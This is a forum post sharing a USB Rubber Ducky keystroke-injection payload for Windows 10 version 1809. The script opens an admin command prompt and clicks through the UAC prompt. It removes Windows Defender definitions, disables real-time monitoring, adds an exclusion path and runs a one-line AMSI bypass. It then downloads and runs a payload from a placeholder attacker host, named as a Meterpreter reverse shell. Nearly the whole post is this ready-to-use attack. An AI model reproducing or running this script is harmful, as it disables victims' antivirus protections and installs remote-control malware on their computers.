Jump to content

[PAYLOAD] Disable Windows Defender - Windows 10 (ver. 1809)


Recommended Posts

Posted

Disclaimer: Originally written in ducky script, then converted to Arduino for a school project.  Video linked uses Arduino Pro Micro.
 

 

POC: https://youtu.be/3hDdLbwFiM8
REM Title: msfQuack.txt
REM Author: mikeOxmaul (Props: Dan Tentler <Twitter @Viss> and Matt Graeber <Twitter @mattifestation>)
REM Date: 20020308
REM Target: Windows 10 (v. 1809)
REM Assumptions:
REM 1. Used against unlocked device w/admin lvl privileges
REM 2. Default 'prompt for consent' UAC policy in place for admin accts
REM Script will do the following:
REM 1. Remove Security Definitions for Windows Defender & Disable IOffice AV Protection
REM 2. Disable Real Time Monitoring Protection & Add Exclusion Path
REM 3. Download, Save and Run payload (windows/meterpreter/reverse_tcp)
REM Apologies in advance for the funky delays and not using 'GUI r'.  Tested on VirtualBox 6.1 on a macOS host.

REM Payload Start

DELAY 3000
REM 3 second delay for device to register
CTRL ESC
REM keyboard shortcut for search bar
DELAY 1700
STRING cmd
REM searching for cmd prompt
DELAY 750
CTRL SHIFT ENTER
REM 'run as admin' keyboard shortcut
DELAY 2500
ALT y
REM bypass UAC prompt
DELAY 1500
STRING cd %userprofile%
ENTER
DELAY 100
STRING "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
REM Removes all security definitions for windows defender and disables AV protection (credit to Dan Tentler)
ENTER
DELAY 100
STRING powershell
ENTER
DELAY 2500
STRING Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath "<define exclusion path here>"
REM Disables defender's 'real time monitoring' and sets exclusion path in event defender conducts a scan
ENTER
DELAY 100
STRING "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
REM One line AMSI bypass (courtesy of Matt Graeber)
ENTER
DELAY 100
STRING iex (New-Object System.Net.WebClient).DownloadFile('http://<ipaddr>/<payload>','<path\to\payload>');Start-Process .\"<path\to\payload>"\
ENTER
DELAY 100
STRING exit
ENTER
REM Exiting Powershell
DELAY 1000
STRING exit
ENTER
REM End of Payload

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...